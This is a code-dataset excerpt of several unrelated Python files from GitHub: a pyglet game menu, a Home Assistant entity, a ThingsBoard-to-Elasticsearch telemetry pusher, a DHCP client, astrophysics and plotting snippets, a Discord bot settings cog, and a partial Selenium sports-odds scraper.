)\n if self.hovered_button is not None:\n if self.hovered_button.check_click( x, y ):\n self.clicked_button = self.hovered_button\n if self.clicked_button == self.fov_slider:\n self.dispatch_event( 'set_fov', self.fov_slider.current_val )\n\n if self.clicked_button == self.mouse_sensitivity_slider:\n self.dispatch_event( 'set_mouse_sensitivity', self.mouse_sensitivity_slider.current_val )\n\n\n def check_release( self, x, y ):\n if self.clicked_button is not None:\n if self.clicked_button.check_hover( x, y ):\n ## Then a button was clicked and released on, so we perform the relevant action.\n ## Toggle wireframe button.\n if self.clicked_button == self.wireframe_button:\n self.dispatch_event( 'toggle_wireframe' )\n\n ## Toggle textures button.\n if self.clicked_button == self.textures_button:\n self.dispatch_event( 'toggle_textures' )\n\n ## Toggle skyboxes button.\n if self.clicked_button == self.skybox_button:\n self.dispatch_event( 'toggle_skyboxes' )\n\n ## Toggle fps button.\n if self.clicked_button == self.fps_button:\n self.dispatch_event( 'toggle_fps' )\n\n ## Back to the previous menu button.\n if self.clicked_button == self.back_button:\n self.dispatch_event( 'go_back' )\n\n self.clicked_button.set_release()\n self.clicked_button = None\n self.check_hover( x, y )\n\n\n\n def check_drag( self, x, y, dx, dy, buttons, modifiers ):\n ## Check if either of the two slider objects are selected.\n if self.hovered_button == self.fov_slider or self.hovered_button == self.mouse_sensitivity_slider:\n ## If so, update the object so that it draws properly and stores the correct current_val.\n self.hovered_button.change_slider_pos( x )\n self.hovered_button.set_current_val()\n\n if self.hovered_button == self.fov_slider:\n self.dispatch_event( 'set_fov', self.fov_slider.current_val )\n\n elif self.hovered_button == self.mouse_sensitivity_slider:\n self.dispatch_event( 'set_mouse_sensitivity', self.mouse_sensitivity_slider.current_val )\n\n\n\nclass LevelSelectMenu( Menu ):\n def __init__( self, x_res, y_res, window_width, window_height, page, font=None ):\n super().__init__( 'Level Select', x_res, y_res, window_width, window_height, font=font )\n self.page = page\n self.back_button = Button( self.window_width, self.window_height, center_x=1/8, center_y=6/7, width=1/9, height=1/6, text='Back', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n if page == 1:\n self.next_button = Button( self.window_width, self.window_height, center_x=7/8, center_y=6/7, width=1/9, height=1/6, text='Next', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n self.buttons = [ self.back_button, self.next_button ]\n else:\n self.buttons = [ self.back_button ]\n\n ## Level buttons will be in three columns. self.edge_offset is the distance from the left edge of the screen to the left edge of the first button. self.button_offset is the distance between the right edge of one button and the left edge of the next. It is necessary that 3 * self.button_size_width + 2 * self.edge_offset + 2 * self.button_offset = 1. Since the default self.button_size_width is 1/4, that means self.edge_offset + self.button_offset = 1/8.\n self.edge_offset = 3 / 32\n self.button_offset = ( ( 1 - ( 3 * self.button_size_width ) ) / 2 ) - self.edge_offset\n self.num_level_buttons = 15\n\n self.level_order = [ 'castle_grounds', 'castle_inside', 'castle_courtyard', 'bob', 'wf', 'jrb', 'ccm', 'bbh', 'hmc', 'lll', 'ssl', 'ddd', 'sl', 'wdw', 'ttm', 'thi', 'ttc', 'rr', 'pss', 'sa', 'wmotr', 'totwc', 'cotmc', 'vcutm', 'bitdw', 'bitfs', 'bits', 'bowser_1', 'bowser_2', 'bowser_3' ]\n\n self.display_names = { 'wdw': 'Wet Dry World', 'ttm': 'Tall Tall Mountain', 'thi': 'Tiny Huge Island', 'ddd': 'Dire Dire Docks', 'hmc': 'Hazy Maze Cave', 'bits': 'Bowser in the Sky', 'ccm': 'Cool Cool Mountain', 'pss': \"Peach's Secret Slide\", 'jrb': 'Jolly Roger Bay', 'rr': 'Rainbow Ride', 'bitfs': 'Bowser in the Fire Sea', 'cotmc': 'Cavern of the Metal Cap', 'bowser_1': 'Bowser 1 (Boss Area)', 'wmotr': 'Wing Mario Over the Rainbow', 'ttc': 'Tick Tock Clock', 'lll': 'Lethal Lava Land', 'totwc': 'Tower of the Wing Cap', 'wf': \"Whomp's Fortress\", 'ssl': 'Shifting Sand Land', 'sa': 'Secret Aquarium', 'vcutm': 'Vanish Cap Under The Moat', 'bob': 'Bob-Omb Battlefield', 'castle_courtyard': \"Castle Courtyard\", 'sl': \"Snowman's Land\", 'bitdw': 'Bowser in the Dark World', 'bbh': \"Big Boo's Haunt\", 'castle_inside': \"Inside the Castle\", 'bowser_3': 'Bowser 3 (Boss Area)', 'bowser_2': 'Bowser 2 (Boss Area)', 'castle_grounds': \"Castle Grounds\" }\n\n self.level_areas = { 'castle_grounds': 1, 'castle_inside': 3, 'castle_courtyard': 1, 'bob': 1, 'wf': 1, 'jrb': 2, 'ccm': 2, 'bbh': 1, 'hmc': 1, 'lll': 2, 'ssl': 3, 'ddd': 2, 'sl': 2, 'wdw': 2, 'ttm': 4, 'thi': 3, 'ttc': 1, 'rr': 1, 'pss': 1, 'sa': 1, 'wmotr': 1, 'totwc': 1, 'cotmc': 1, 'vcutm': 1, 'bitdw': 1, 'bitfs': 1, 'bits': 1, 'bowser_1': 1, 'bowser_2': 1, 'bowser_3': 1 }\n\n self.build_menu()\n\n\n def build_menu( self ):\n for i in range( self.num_level_buttons ):\n level_ind = ( self.page - 1 ) * self.num_level_buttons + i\n button_x = ( i % 3 ) * ( self.button_size_width + self.button_offset ) + ( ( self.button_size_width / 2 ) + self.edge_offset )\n button_y = ( 2 / 3 ) - ( i // 3 ) * ( 27 / 192 )\n button_name = self.level_order[ level_ind ] + '_button'\n display_text = self.display_names[ self.level_order[ level_ind ] ]\n setattr( self, button_name, Button( self.window_width, self.window_height, center_x=button_x, center_y=button_y, width=self.button_size_width, height=self.button_size_height, text=display_text, font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group ) )\n setattr( getattr( self, button_name ), 'level', self.level_order[ level_ind ] )\n setattr( getattr( self, button_name ), 'areas', self.level_areas [ self.level_order[ level_ind ] ] )\n self.buttons.append( getattr( self, button_name ) )\n\n\n def check_release( self, x, y ):\n if self.clicked_button is not None:\n if self.clicked_button.check_hover( x, y ):\n ## Then a button was clicked and released on, so we perform the relevant action.\n\n ## Back to the previous menu button.\n if self.clicked_button == self.back_button:\n self.dispatch_event( 'go_back' )\n\n elif self.page == 1 and self.clicked_button == self.next_button:\n self.dispatch_event( 'enter_submenu', 'level_select_menu_2' )\n\n ## Buttons to load levels\n elif hasattr( self.clicked_button, 'level' ):\n self.dispatch_event( 'load_new_level', self.clicked_button.level )\n\n self.clicked_button.set_release()\n self.clicked_button = None\n self.check_hover( x, y )\n\n\n\nclass PauseMenu():\n \"\"\"The PauseMenu class mainly performs input handling and drawing while paused. The actual menus will be instances of other classes that will subclass Menu.\"\"\"\n\n def __init__( self, x_res, y_res, window_width, window_height, wireframe, font=None ):\n self.x_res = x_res\n self.y_res = y_res\n self.window_width = window_width\n self.window_height = window_height\n self.wireframe = wireframe\n\n self.font = font\n\n self.pause_quad = pyglet.shapes.Rectangle( 0, 0, self.x_res, self.y_res, [ 0, 0, 0 ] )\n self.pause_quad.opacity = 160\n\n self.intro_menu = IntroMenu( self.x_res, self.y_res, self.window_width, self.window_height, font=self.font )\n self.main_pause_menu = MainPauseMenu( self.x_res, self.y_res, self.window_width, self.window_height, font=self.font )\n self.options_menu = OptionsMenu( self.x_res, self.y_res, self.window_width, self.window_height, font=self.font )\n self.level_select_menu = LevelSelectMenu( self.x_res, self.y_res, self.window_width, self.window_height, 1, font=self.font )\n self.level_select_menu_2 = LevelSelectMenu( self.x_res, self.y_res, self.window_width, self.window_height, 2, font=self.font )\n self.current_menu = self.intro_menu\n self.menus = [ self.intro_menu, self.main_pause_menu, self.options_menu, self.level_select_menu, self.level_select_menu_2 ]\n self.menu_stack = [ self.intro_menu ]\n\n\n def go_back( self ):\n self.menu_stack.pop()\n self.current_menu = self.menu_stack[ -1 ]\n\n\n def enter_submenu( self, menu_name ):\n menu = getattr( self, menu_name )\n self.current_menu = menu\n self.menu_stack.append( menu )\n\n\n def on_mouse_motion( self, x, y, dx, dy ):\n ## Forward action to the current menu.\n self.current_menu.check_hover( x, y )\n return True\n\n\n def on_mouse_press( self, x, y, button, modifiers ):\n ## Forward action to the current menu if left click.\n if button == pyglet.window.mouse.LEFT:\n self.current_menu.check_click( x, y )\n return True\n\n\n def on_mouse_release( self, x, y, button, modifiers ):\n ## Forward action to the current menu if left release.\n if button == pyglet.window.mouse.LEFT:\n self.current_menu.check_release( x, y )\n return True\n \n\n def on_mouse_drag( self, x, y, dx, dy, button, modifiers ):\n ## Forward action to the current menu if it is the Options menu. That is the only menu that will have any elements that will deal with mouse drag.\n if button == pyglet.window.mouse.LEFT:\n if self.current_menu == self.options_menu:\n self.current_menu.check_drag( x, y, dx, dy, button, modifiers )\n return True\n\n\n def set_wireframe( self, wireframe ):\n self.wireframe = wireframe\n\n\n def draw( self ):\n ## Set up Ortho matrix for 2D.\n glTexEnvi( GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_REPLACE )\n glMatrixMode( GL_PROJECTION )\n glLoadIdentity()\n glOrtho( 0, self.x_res, 0, self.y_res, 0, 1 )\n\n ## Disable depth calculations.\n glDisable( GL_DEPTH_TEST )\n glDepthMask( GL_FALSE )\n\n ## If wireframe is enabled, we have to reenable polygon fill.\n if self.wireframe:\n glPolygonMode( GL_FRONT_AND_BACK, GL_FILL )\n glMatrixMode( GL_MODELVIEW )\n glLoadIdentity()\n\n ## Draw current pause menu.\n if self.current_menu != self.intro_menu:\n self.pause_quad.draw()\n self.current_menu.draw()\n\n ## If wireframe is enabled, disable polygon fill.\n if self.wireframe:\n glPolygonMode( GL_FRONT_AND_BACK, GL_LINE )\n\n ## Re-enable depth calculations.\n glDepthMask( GL_TRUE )\n glEnable( GL_DEPTH_TEST )\n\n\n def on_screen_resize( self, width, height ):\n for each_menu in self.menus:\n each_menu.on_resize( width, height )\n\n\n","repo_name":"seph702/LevelViewer64","sub_path":"menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":37200,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"36359980778","text":"from abc import ABC\nimport logging\n\nfrom homeassistant.components.select import SelectEntity\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import ATTR_STATE, Platform\nfrom homeassistant.core import HomeAssistant\n\nfrom .common.base_entity import IntegrationBaseEntity, async_setup_base_entry\nfrom .common.consts import ACTION_ENTITY_SELECT_OPTION, ATTR_ATTRIBUTES\nfrom .common.entity_descriptions import IntegrationSelectEntityDescription\nfrom .managers.coordinator import Coordinator\nfrom .models.monitor_data import MonitorData\n\n_LOGGER = logging.getLogger(__name__)\n\n\nasync def async_setup_entry(\n hass: HomeAssistant, entry: ConfigEntry, async_add_entities\n):\n await async_setup_base_entry(\n hass,\n entry,\n Platform.SELECT,\n IntegrationSelectEntity,\n async_add_entities,\n )\n\n\nclass IntegrationSelectEntity(IntegrationBaseEntity, SelectEntity, ABC):\n \"\"\"Representation of a sensor.\"\"\"\n\n def __init__(\n self,\n hass: HomeAssistant,\n entity_description: IntegrationSelectEntityDescription,\n coordinator: Coordinator,\n monitor: MonitorData,\n ):\n super().__init__(hass, entity_description, coordinator, monitor)\n\n self.entity_description = entity_description\n\n self._attr_options = entity_description.options\n self._attr_current_option = entity_description.options[0]\n\n async def async_select_option(self, option: str) -> None:\n \"\"\"Change the selected option.\"\"\"\n await self.async_execute_device_action(ACTION_ENTITY_SELECT_OPTION, option)\n\n def update_component(self, data):\n \"\"\"Fetch new state parameters for the sensor.\"\"\"\n if data is not None:\n state = data.get(ATTR_STATE)\n attributes = data.get(ATTR_ATTRIBUTES)\n\n self._attr_current_option = state\n self._attr_extra_state_attributes = attributes\n\n else:\n self._attr_current_option = self.entity_description.options[0]\n","repo_name":"elad-bar/ha-shinobi","sub_path":"custom_components/shinobi/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"70404943525","text":"import os\nimport time\nimport sys\nimport json\nimport requests\nimport calendar\nimport datetime\nimport base64\n\n\nwith open('ThingsBoard-config.json', 'r') as f:\n config = json.load(f)\n# Load config from JSON file\nTHINGSBOARD_HOST = config['THINGSBOARD_HOST']\nTHINGSBOARD_USERNAME = config['THINGSBOARD_USERNAME']\nTHINGSBOARD_PASSWORD = config['THINGSBOARD_PASSWORD']\nTHINGSBOARD_DEVICEID = config['THINGSBOARD_DEVICEID']\nTHINGSBOARD_KEYS = config['THINGSBOARD_KEYS']\n\n# Get the JWT token\nhttpPostUrl = 'http://'+THINGSBOARD_HOST+'/api/auth/login?Content-Type=application/json&Accept=application/json'\nhttpPostBody = {\"username\": THINGSBOARD_USERNAME, \"password\": THINGSBOARD_PASSWORD}\nhttpPostHeathers = {\"Content-Type\": \"application/json\"}\nr = requests.post(httpPostUrl, data=json.dumps(httpPostBody), headers=httpPostHeathers)\nprint(\"Status Code: \" + str(r.status_code))\njwt_data = r.json()\nprint(\"JWT Token:\")\nprint(\"##########\")\nprint(jwt_data)\nprint(\"##########\")\njwt_data = json.loads(r.text)\njwt_token = jwt_data['token']\n\n# Get the latest telemetry\nhttpGetUrl = 'http://'+THINGSBOARD_HOST+'/api/plugins/telemetry/DEVICE/'+THINGSBOARD_DEVICEID+'/values/timeseries?keys='+THINGSBOARD_KEYS\nhttpGetHeaders = {\"Content-Type\": \"application/json\", \"X-Authorization\": \"Bearer \"+jwt_token}\nr2 = requests.get(httpGetUrl, headers=httpGetHeaders)\nprint(\"Status Code: \" + str(r2.status_code))\ntelemetry_data = r2.json()\nprint(\"Telemetry Data:\")\nprint(\"##########\")\nprint(telemetry_data)\nprint(\"##########\")\n\n# Get time\ncurrent_dt = datetime.datetime.utcnow()\ncurrent_dt_unix = calendar.timegm(current_dt.utctimetuple())\ncurrent_dt_unix_min = current_dt_unix - 120\nprint(\"Current Time: \")\nprint(current_dt_unix)\nprint(\"Current Time -120s\")\nprint(current_dt_unix_min)\nprint(\"##########\")\n\n# Get Telemetry from Past Interval\nhttpGetUrl = 'http://'+THINGSBOARD_HOST+'/api/plugins/telemetry/DEVICE/'+THINGSBOARD_DEVICEID+'/values/timeseries?keys='+THINGSBOARD_KEYS+'&startTs='+str(current_dt_unix_min)+'000'+'&endTs='+str(current_dt_unix)+'000'+'&interval=60000&limit=100&agg=AVG'\nhttpGetHeaders = {\"Content-Type\": \"application/json\", \"X-Authorization\": \"Bearer \"+jwt_token}\nr3 = requests.get(httpGetUrl, headers=httpGetHeaders)\nprint(\"Status Code: \" + str(r3.status_code))\ntelemetry_data = r3.json()\nprint(\"Telemetry Data:\")\nprint(\"##########\")\nprint(telemetry_data)\nprint(\"##########\")\ntelemetry_data = json.loads(r3.text)\n# Get the number of telemetry data\nnumber_telemetry = r3.json()\n\n# Load ES Configuration and Get ES Token\n# Load config from JSON file\nwith open('ES-config.json', 'r') as h:\n config_es = json.load(h)\nES_HOST = config_es['ES_HOST']\nES_USER = config_es['ES_USER']\nES_PASSWORD = config_es['ES_PASSWORD']\nES_INDEX = config_es['ES_INDEX']\nES_TYPE = config_es['ES_TYPE']\n\nwith open('Sensor-config.json', 'r') as g:\n\tconfig_sensor = json.load(g)\nsensorID = config_sensor['sensorID']\nsensorLocation = config_sensor['sensorLocation']\n\n# GET ES Token\n# es_httpTokenUrl = 'https://'+ES_HOST+'/_xpack/security/oauth2/token'\n# es_httpTokenBody = {\"grant_type\" : \"password\", \"username\" : ES_USER, \"password\" : ES_PASSWORD}\n# es_httpTokenHeaders = {\"Content-Type\": \"application/json\"}\n\n# r4 = requests.post(es_httpTokenUrl, data=json.dumps(es_httpTokenBody), headers=es_httpTokenHeaders)\n# print(\"Status Code: \" + str(r4.status_code))\n# esToken_data = r4.json()\n# print(\"ES Token Data:\")\n# print(\"##########\")\n# print(esToken_data)\n# print(\"##########\")\n# esToken_data = json.loads(r4.text)\n# esToken = esToken_data['access_token']\n\n# encode user/password base64\ncredentials_string = ES_USER+\":\"+ES_PASSWORD\ncredentials = base64.b64encode(credentials_string)\n\n# Iterate and push each telemetry node to ES\nfor index, item in enumerate(number_telemetry['temperature']):\n\ttelemetry_temperature = telemetry_data['temperature'][index]['value']\n\ttelemetry_temperature_timestamp = telemetry_data['temperature'][index]['ts']\n\tprint(\"**********\")\n\tprint(\"Temperature to push: \" + telemetry_temperature)\n\ttelemetry_humidity = telemetry_data['humidity'][index]['value']\n\ttelemetry_humidity_timestamp = telemetry_data['humidity'][index]['ts']\n\tprint(\"Humidity to push: \"+ telemetry_humidity)\n\tprint(\"**********\")\n\n\t# Push to Elasticsearch\n\tprint(\"**********\")\n\tprint(\"Pushing to Elasticsearch\")\n\tprint(\"**********\")\n\t# Index Content\n\tes_httpIndexUrl = 'https://'+ES_HOST+'/'+ES_INDEX+'/'+ES_TYPE\n\tes_httpIndexBody = {\"sensorID\": sensorID, \"sensorLocation\": sensorLocation, \"temperature\": telemetry_temperature, \"humidity\": telemetry_humidity, \"temperatureTimestamp\": telemetry_temperature_timestamp, \"humidityTimestamp\": telemetry_humidity_timestamp}\n\tes_httpIndexHeaders = {\"Content-Type\": \"application/json\", \"Authorization\": \"Basic \"+credentials}\n\n\tr5 = requests.post(es_httpIndexUrl, data=json.dumps(es_httpIndexBody), headers=es_httpIndexHeaders)\n\tprint(\"Status Code:\" + str(r5.status_code))\n\tprint(\"Message: \")\n\tprint(r5.json())","repo_name":"gforce81/ThingsBoard-IoT","sub_path":"push_to_elasticsearch.py","file_name":"push_to_elasticsearch.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28774748280","text":"from socket import *\r\n\r\n\r\ndef main():\r\n sock = socket(AF_INET, SOCK_DGRAM)\r\n\r\n print(\"Sending LIST request to DHCP server\")\r\n sock.sendto(\"LIST\".encode(), ('localhost', 12000))\r\n\r\n resp = sock.recv(2048)\r\n records = resp.decode().splitlines()\r\n\r\n print(\"All records:\")\r\n for record in records:\r\n print(record)\r\n\r\n sock.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\n","repo_name":"imurphy92064/DHCP-Client-Server-Demo","sub_path":"dhcpadmin.py","file_name":"dhcpadmin.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36723136074","text":"import pynbody\n\ndef isolate_cgm(sim_fn, return_sim = False):\n s = pynbody.load(sim_fn)\n s.physical_units()\n h = s.halos()\n\n h1 = h[1] \n\n print('simulation loaded')\n\n # center and align h1\n pynbody.analysis.halo.center(h1,mode='hyb')\n pynbody.analysis.angmom.faceon(h1, cen=(0,0,0))\n\n print('centered and aligned')\n\n # create filters to remove inner disk \n rdisk = \"15 kpc\"\n height = \"5 kpc\" # height is from midplane\n disk = pynbody.filt.Disc(rdisk, height, cen=(0,0,0)) \n\n # filter current halo to remove disk\n cgm_faceon = h1[~disk] \n\n print('removed disc of radius', rdisk, 'and height', height)\n if return_sim:\n return cgm_faceon, s, h1 \n else:\n return cgm_faceon","repo_name":"bvshih/CGM","sub_path":"scripts/cgm.py","file_name":"cgm.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13305287355","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# df = pd.read_excel('at1.xlsx', engine='openpyxl', sheet_name='1')\ndf = pd.read_csv('filtered_at.csv')\n# df = pd.read_\nA = df[df['type'] == 'A']\nB = df[df['type'] == 'B']\nC = df[df['type'] == 'C']\nlen_list = [len(A), len(B), len(C)]\ncolor=[]\nplt.figure(dpi=300)\nplt.bar(color=['#6fad49', '#4373c7', '#4373c7'], x=[0, 1, 2], height=len_list, width=0.6, tick_label=['A', 'B', 'C'])\nplt.rcParams['font.sans-serif'] = ['Arial Unicode MS']\n# plt.figure(dpi=150)\n\nplt.xlabel('材料种类')\nplt.ylabel('供应商数量')\n\nplt.show()","repo_name":"yilish/CUMCM_2021_yilishen_scripting","sub_path":"show_quant.py","file_name":"show_quant.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"43098646069","text":"import disnake\r\nfrom disnake.ext import commands\r\nfrom disnake.interactions import MessageInteraction\r\nfrom disnake import TextInputStyle\r\nfrom db import DataBase\r\nimport config\r\n\r\nclass MenuNav(disnake.ui.Modal):\r\n def __init__(self):\r\n self.DataBase = DataBase(\"db.db\")\r\n components = [\r\n disnake.ui.TextInput(\r\n label=\"Id\",\r\n custom_id=\"Id\",\r\n style=TextInputStyle.short\r\n )\r\n ]\r\n\r\n super().__init__(\r\n title=\"Id навигационного сообщения\",\r\n components=components,\r\n custom_id=\"Id\"\r\n )\r\n\r\n\r\n async def callback(self, inter: disnake.ModalInteraction):\r\n embed = disnake.Embed(color=disnake.Color.green() , title=\"Успех\" , description=\"Настройки были успешно обновлены!\")\r\n for key, value in inter.text_values.items():\r\n id_navigation = value[:1024]\r\n self.DataBase.settings(id_navigation , \"Nav\")\r\n\r\n await inter.send(embed=embed)\r\n\r\n\r\nclass MenuPiar(disnake.ui.Modal):\r\n def __init__(self):\r\n self.DataBase = DataBase(\"db.db\")\r\n components = [\r\n disnake.ui.TextInput(\r\n label=\"Id\",\r\n custom_id=\"Id\",\r\n style=TextInputStyle.short\r\n )\r\n ]\r\n\r\n super().__init__(\r\n title=\"Id сообщения пиара\",\r\n components=components,\r\n custom_id=\"Id\"\r\n )\r\n\r\n\r\n async def callback(self, inter: disnake.ModalInteraction):\r\n embed = disnake.Embed(color=disnake.Color.green() , title=\"Успех\" , description=\"Настройки были успешно обновлены!\")\r\n for key, value in inter.text_values.items():\r\n id_piar = value[:1024]\r\n self.DataBase.settings(id_piar , \"Piar\")\r\n\r\n await inter.send(embed=embed)\r\n\r\n\r\nclass Select(disnake.ui.Select):\r\n def __init__(self):\r\n options = [\r\n disnake.SelectOption(label=\"Id навигационного сообщения\" , emoji=\"🌐\"),\r\n disnake.SelectOption(label=\"Id сообщения пиара\" , emoji=\"🆔\")\r\n ]\r\n\r\n super().__init__(\r\n placeholder=\"Настройки\",\r\n min_values=1,\r\n max_values=1,\r\n custom_id=\"Настройки\",\r\n options=options\r\n )\r\n\r\n async def callback(self, inter: MessageInteraction):\r\n if self.values[0] == \"Id навигационного сообщения\":\r\n await inter.response.send_modal(MenuNav())\r\n\r\n elif self.values[0] == \"Id сообщения пиара\":\r\n await inter.response.send_modal(MenuPiar())\r\n\r\nclass Settings(commands.Cog):\r\n def __init__(self , bot):\r\n self.bot = bot\r\n\r\n @commands.slash_command(description=\"Настройки бота\")\r\n @commands.has_permissions(administrator=True)\r\n async def settings(self , ctx):\r\n embed = disnake.Embed(\r\n color=disnake.Color.green(),\r\n title=\"Настройки сервера\",\r\n description=\"Взаимодействуйте с выпадающим меню, чтобы настроить сервер\"\r\n )\r\n\r\n view = disnake.ui.View()\r\n view.add_item(Select())\r\n await ctx.send(embed=embed , view=view)\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Settings(bot))","repo_name":"Bogdan11212/chillbot","sub_path":"cogs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29112424159","text":"from django.contrib import admin\n\nfrom django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin as BaseUserAdmin\n\nfrom models import Play, Song, User, TimeInterval\n\n\nclass UserAdmin(BaseUserAdmin):\n list_display = [\n '__unicode__',\n 'is_active',\n ]\n list_editable = [\n 'is_active',\n ]\nadmin.site.register(User, UserAdmin)\n\n\nclass SongAdmin(admin.ModelAdmin):\n list_display = [\n 'dateUploaded',\n 'trackTitle',\n 'trackArtist',\n 'timeInterval',\n 'deleted',\n ]\n\nadmin.site.register(Song, SongAdmin)\nadmin.site.register(Play)\nadmin.site.register(TimeInterval)\n","repo_name":"MASASFM/MASAS","sub_path":"MASAS/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"23869909877","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom time import sleep\r\nfrom datetime import datetime\r\nfrom selenium import webdriver\r\nimport random\r\nimport sqlite3\r\nimport os\r\n\r\nc_path = os.path.dirname(__file__)\r\nos.chdir(c_path)\r\n# print(c_path)\r\n\r\ndata_base = str(datetime.today().date())\r\nconn = sqlite3.connect(f'results\\\\backup\\\\back-up-{data_base}.db')\r\ncr = conn.cursor()\r\ndf_config = pd.read_excel('config.xlsx')\r\ndf_config.active = df_config.active.astype(int)\r\nall_links_leagues = df_config['link'][df_config['active'] == 1]\r\ndriver = webdriver.Chrome('chromedriver.exe')\r\ndriver.maximize_window()\r\n\r\nfor c, link in enumerate(all_links_leagues):\r\n os.system('cls')\r\n print(f'scraping : {link} {c+1}/{len(all_links_leagues)}', end='\\n\\n')\r\n c = 0\r\n driver.get(link)\r\n sleep(3*random.random())\r\n try:\r\n more = driver.find_element_by_link_text('Mostra più incontri')\r\n more.click()\r\n sleep(3)\r\n except:\r\n pass\r\n sleep(3*random.random())\r\n try:\r\n more = driver.find_element_by_link_text('Mostra più incontri')\r\n more.click()\r\n sleep(3)\r\n except:\r\n pass\r\n try:\r\n more = driver.find_element_by_link_text('Mostra più incontri')\r\n more.click()\r\n sleep(3)\r\n except:\r\n pass\r\n try:\r\n more = driver.find_element_by_link_text('Mostra più incontri')\r\n more.click()\r\n sleep(3)\r\n except:\r\n pass\r\n\r\n soup_home = BeautifulSoup(driver.page_source, 'lxml')\r\n all_raw_tags_1 = []\r\n all_raw_tags_1 = soup_home.find_all('div', class_='event__match')\r\n all_raw_tags_2 = [x['id'].replace('g_1_', '') for x in all_raw_tags_1]\r\n all_matches_links = [\r\n f'https://www.diretta.it/partita/{x}/#informazioni-partita/informazioni-partita' for x in all_raw_tags_2]\r\n\r\n soups = []\r\n for c, match_link in enumerate(all_matches_links):\r\n print(f'match: {c+1}/{len(all_matches_links)}')\r\n sleep(random.random())\r\n driver.get(match_link)\r\n sleep(random.random()*1.2)\r\n soups.append(BeautifulSoup(driver.page_source, 'lxml'))\r\n c += 1\r\n if c == 3:\r\n break\r\n\r\n countries = []\r\n leagues = []\r\n dates = []\r\n times = []\r\n homes = []\r\n aways = []\r\n fts = []\r\n hts = []\r\n first_values = []\r\n first_dirs = []\r\n x_values = []\r\n x_dirs = []\r\n second_values = []\r\n second_dirs = []\r\n\r\n for c, soup in enumerate(soups):\r\n\r\n try:\r\n try:\r\n three_ods_raw = soup.find_all('div', class_='cellWrapper')\r\n\r\n try:\r\n first_value = three_ods_raw[0]['title']\r\n first_value = re.findall('\\d+.\\d+', first_value)[-1]\r\n first_dir = three_ods_raw[0]['title']\r\n first_dir = re.findall(r'\\[\\w\\]', first_dir)[0]\r\n first_dir = first_dir.replace('[', '')\r\n first_dir = first_dir.replace(']', '')\r\n first_dir = first_dir.replace('u', 'UP')\r\n first_dir = first_dir.replace('d', 'DOWN')\r\n except IndexError:\r\n first_value = three_ods_raw[0].text\r\n first_value = re.findall(\r\n '\\d+.\\d+', first_value)[-1]\r\n first_dir = '-'\r\n\r\n try:\r\n x_value = three_ods_raw[1]['title']\r\n x_value = re.findall('\\d+.\\d+', x_value)[-1]\r\n\r\n x_dir = three_ods_raw[1]['title']\r\n x_dir = re.findall(r'\\[\\w\\]', x_dir)[0]\r\n x_dir = x_dir.replace('[', '')\r\n x_dir = x_dir.replace(']', '')\r\n x_dir = x_dir.replace('u', 'UP')\r\n x_dir = x_dir.replace('d', 'DOWN')\r\n except IndexError:\r\n x_value = three_ods_raw[1].text\r\n x_value = re.findall(\r\n '\\d+.\\d+', x_value)[-1]\r\n x_dir = '-'\r\n\r\n try:\r\n second_value = three_ods_raw[2]['title']\r\n second_value = re.findall('\\d+.\\d+', second_value)[-1]\r\n second_dir = three_ods_raw[2]['title']\r\n second_dir = re.findall(r'\\[\\w\\]', second_dir)[0]\r\n second_dir = second_dir.replace('[', '')\r\n second_dir = second_dir.replace(']', '')\r\n second_dir = second_dir.replace('u', 'UP')\r\n second_dir = second_dir.replace('d', 'DOWN')\r\n except IndexError:\r\n second_value = three_ods_raw[2].text\r\n second_value = re.findall(\r\n '\\d+.\\d+', second_value)[-1]\r\n second_dir = '-'\r\n\r\n except:\r\n first_value = '-'\r\n first_dir = '-'\r\n x_dir = '-'\r\n x_value = '-'\r\n second_dir = '-'\r\n second_value = '-'\r\n\r\n # first_value = three_ods_raw[0]['title'][7:]\r\n # first_dir = three_ods_raw[0]['title'][5]\r\n # if first_value == '1.04':\r\n # print(c)\r\n\r\n # x_value = three_ods_raw[1]['title'][7:]\r\n # x_dir = three_ods_raw[1]['title'][5]\r\n\r\n # second_value = three_ods_raw[2]['title'][7:]\r\n # second_dir = three_ods_raw[2]['title'][5]\r\n\r\n country_league = soup.find(\r\n 'span', class_='tournamentHeader__country').text\r\n country = country_league.split(':')[0].strip()\r\n league = country_league.split(':')[1].strip()\r\n countries.append(country)\r\n leagues.append(league)\r\n\r\n date_time = soup.find(\r\n 'div', class_='duelParticipant__startTime').text\r\n date_ = date_time.split()[0]\r\n time_ = date_time.split()[1]\r\n dates.append(date_)\r\n times.append(time_)\r\n\r\n home = soup.find(\r\n 'div', class_='duelParticipant__home').text.strip()\r\n homes.append(home)\r\n 